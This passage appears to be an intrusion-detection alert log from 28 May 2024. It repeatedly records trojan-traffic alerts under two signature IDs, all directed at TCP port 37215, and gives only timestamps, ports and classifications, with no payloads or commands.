          Timestamp:05/28/24-14:47:12.873608
          SID:2835222
          Source Port:48780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044562
          SID:2835222
          Source Port:56680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102946
          SID:2835222
          Source Port:39822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.978860
          SID:2829579
          Source Port:37036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536531
          SID:2829579
          Source Port:46290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806174
          SID:2835222
          Source Port:51224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.984968
          SID:2835222
          Source Port:58576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794387
          SID:2835222
          Source Port:49654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979306
          SID:2835222
          Source Port:50222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125275
          SID:2829579
          Source Port:40594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764030
          SID:2835222
          Source Port:42486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339232
          SID:2829579
          Source Port:54496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476482
          SID:2835222
          Source Port:51058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196965
          SID:2829579
          Source Port:38342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.684975
          SID:2829579
          Source Port:48518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196570
          SID:2829579
          Source Port:38768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.608881
          SID:2835222
          Source Port:50278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143635
          SID:2829579
          Source Port:38760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796188
          SID:2829579
          Source Port:55120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214133
          SID:2829579
          Source Port:49836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437391
          SID:2829579
          Source Port:33408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485306
          SID:2835222
          Source Port:33408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530022
          SID:2835222
          Source Port:38666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.629755
          SID:2829579
          Source Port:38820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669440
          SID:2829579
          Source Port:40974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206747
          SID:2829579
          Source Port:57324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145244
          SID:2835222
          Source Port:40374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209407
          SID:2835222
          Source Port:60602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764210
          SID:2829579
          Source Port:38912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708553
          SID:2829579
          Source Port:39138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655493
          SID:2829579
          Source Port:55314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842472
          SID:2829579
          Source Port:41432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138142
          SID:2835222
          Source Port:56760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812887
          SID:2835222
          Source Port:36912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532945
          SID:2835222
          Source Port:45412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.278908
          SID:2829579
          Source Port:37018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.957903
          SID:2829579
          Source Port:32888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491412
          SID:2829579
          Source Port:51282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402334
          SID:2835222
          Source Port:56700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.079501
          SID:2829579
          Source Port:36134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299315
          SID:2829579
          Source Port:59968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876323
          SID:2829579
          Source Port:41584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240660
          SID:2835222
          Source Port:52044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.174528
          SID:2829579
          Source Port:60054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689684
          SID:2829579
          Source Port:35450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771762
          SID:2835222
          Source Port:56348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536763
          SID:2835222
          Source Port:58202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150915
          SID:2829579
          Source Port:49512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.773883
          SID:2835222
          Source Port:43766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778770
          SID:2835222
          Source Port:58228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.853273
          SID:2835222
          Source Port:45524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.300889
          SID:2829579
          Source Port:58254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879129
          SID:2829579
          Source Port:59204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267384
          SID:2829579
          Source Port:45290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665422
          SID:2835222
          Source Port:39830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.813273
          SID:2829579
          Source Port:37104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125483
          SID:2829579
          Source Port:40826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298528
          SID:2835222
          Source Port:60880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.285142
          SID:2829579
          Source Port:58730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214863
          SID:2829579
          Source Port:60802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588927
          SID:2835222
          Source Port:51688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153846
          SID:2829579
          Source Port:56900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780258
          SID:2835222
          Source Port:36676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482468
          SID:2835222
          Source Port:48726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958628
          SID:2835222
          Source Port:44726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267433
          SID:2835222
          Source Port:33664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474765
          SID:2835222
          Source Port:33668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530163
          SID:2835222
          Source Port:38604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.499733
          SID:2829579
          Source Port:50314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978367
          SID:2835222
          Source Port:39974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160367
          SID:2835222
          Source Port:55648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196215
          SID:2829579
          Source Port:57232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548475
          SID:2829579
          Source Port:45228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152082
          SID:2835222
          Source Port:33028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656171
          SID:2835222
          Source Port:48078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511210
          SID:2829579
          Source Port:46326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680333
          SID:2829579
          Source Port:36038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745746
          SID:2829579
          Source Port:39740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482836
          SID:2829579
          Source Port:51438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843446
          SID:2835222
          Source Port:43598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.159141
          SID:2829579
          Source Port:43748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299220
          SID:2829579
          Source Port:47960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778459
          SID:2829579
          Source Port:58182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475599
          SID:2829579
          Source Port:53680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095438
          SID:2835222
          Source Port:39866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735848
          SID:2835222
          Source Port:47962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020329
          SID:2835222
          Source Port:45824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177088
          SID:2835222
          Source Port:34260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213991
          SID:2829579
          Source Port:58962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.060268
          SID:2829579
          Source Port:59612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399648
          SID:2835222
          Source Port:55874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083788
          SID:2829579
          Source Port:53860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269877
          SID:2829579
          Source Port:55404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441714
          SID:2835222
          Source Port:47522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462103
          SID:2829579
          Source Port:36922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178453
          SID:2835222
          Source Port:39264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542174
          SID:2835222
          Source Port:33226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338106
          SID:2829579
          Source Port:56490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666228
          SID:2829579
          Source Port:54980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202227
          SID:2829579
          Source Port:46330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772166
          SID:2829579
          Source Port:57682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.563035
          SID:2835222
          Source Port:48718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168454
          SID:2829579
          Source Port:33660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657072
          SID:2835222
          Source Port:33740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062066
          SID:2835222
          Source Port:46594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462908
          SID:2829579
          Source Port:43046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114097
          SID:2829579
          Source Port:55336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960743
          SID:2835222
          Source Port:46416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803810
          SID:2835222
          Source Port:55778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.734734
          SID:2829579
          Source Port:35490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243922
          SID:2829579
          Source Port:49346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136926
          SID:2829579
          Source Port:47830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781088
          SID:2835222
          Source Port:38126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.243046
          SID:2829579
          Source Port:57032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650210
          SID:2835222
          Source Port:50956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804722
          SID:2835222
          Source Port:42808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272798
          SID:2835222
          Source Port:51980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475889
          SID:2829579
          Source Port:39352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.991500
          SID:2835222
          Source Port:53020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613926
          SID:2829579
          Source Port:53756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729659
          SID:2835222
          Source Port:56702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298784
          SID:2829579
          Source Port:35892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.077611
          SID:2835222
          Source Port:37582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228254
          SID:2829579
          Source Port:34672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321084
          SID:2835222
          Source Port:52406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.419883
          SID:2829579
          Source Port:53922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299709
          SID:2835222
          Source Port:37472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339339
          SID:2829579
          Source Port:37352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598755
          SID:2829579
          Source Port:44192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989019
          SID:2835222
          Source Port:48740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.908035
          SID:2835222
          Source Port:54832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.135983
          SID:2829579
          Source Port:46418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770302
          SID:2835222
          Source Port:53822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963992
          SID:2829579
          Source Port:39980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.499848
          SID:2835222
          Source Port:51344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483665
          SID:2835222
          Source Port:51876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.677682
          SID:2835222
          Source Port:36330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111338
          SID:2835222
          Source Port:51340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324050
          SID:2829579
          Source Port:37740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114553
          SID:2829579
          Source Port:34650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605916
          SID:2829579
          Source Port:60258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268207
          SID:2835222
          Source Port:38938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273196
          SID:2835222
          Source Port:43584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160844
          SID:2829579
          Source Port:52000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270646
          SID:2835222
          Source Port:45554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123692
          SID:2829579
          Source Port:39484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136865
          SID:2835222
          Source Port:46132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102373
          SID:2835222
          Source Port:49842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214443
          SID:2829579
          Source Port:34994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525740
          SID:2835222
          Source Port:57060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943425
          SID:2835222
          Source Port:59900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.553587
          SID:2835222
          Source Port:60658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922748
          SID:2835222
          Source Port:58288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116794
          SID:2829579
          Source Port:49610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.059665
          SID:2829579
          Source Port:35112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738582
          SID:2835222
          Source Port:37164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239658
          SID:2829579
          Source Port:44304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177072
          SID:2835222
          Source Port:50262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.223289
          SID:2829579
          Source Port:33190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.155023
          SID:2835222
          Source Port:50776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.610434
          SID:2835222
          Source Port:38560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142024
          SID:2835222
          Source Port:36176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221247
          SID:2829579
          Source Port:39166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547262
          SID:2829579
          Source Port:49258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805024
          SID:2829579
          Source Port:48986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341142
          SID:2835222
          Source Port:45322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.683091
          SID:2829579
          Source Port:60740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849306
          SID:2835222
          Source Port:39030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328002
          SID:2835222
          Source Port:44358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093824
          SID:2829579
          Source Port:53030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739814
          SID:2829579
          Source Port:44402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497628
          SID:2835222
          Source Port:56446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480800
          SID:2829579
          Source Port:59758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462229
          SID:2829579
          Source Port:47834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483664
          SID:2829579
          Source Port:40254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846415
          SID:2829579
          Source Port:60358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281301
          SID:2829579
          Source Port:51092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796484
          SID:2835222
          Source Port:47564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.811745
          SID:2835222
          Source Port:47898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727194
          SID:2829579
          Source Port:49694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543472
          SID:2835222
          Source Port:56000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472699
          SID:2829579
          Source Port:52610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324620
          SID:2835222
          Source Port:45452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402359
          SID:2829579
          Source Port:57836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191915
          SID:2829579
          Source Port:49814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.180888
          SID:2835222
          Source Port:42882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738863
          SID:2835222
          Source Port:54184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210426
          SID:2829579
          Source Port:39408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326804
          SID:2835222
          Source Port:38168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176672
          SID:2835222
          Source Port:44782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215038
          SID:2829579
          Source Port:40918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724618
          SID:2829579
          Source Port:45568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849218
          SID:2829579
          Source Port:51786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195228
          SID:2829579
          Source Port:53444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290236
          SID:2835222
          Source Port:58882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476222
          SID:2829579
          Source Port:39120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.545907
          SID:2835222
          Source Port:37148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334116
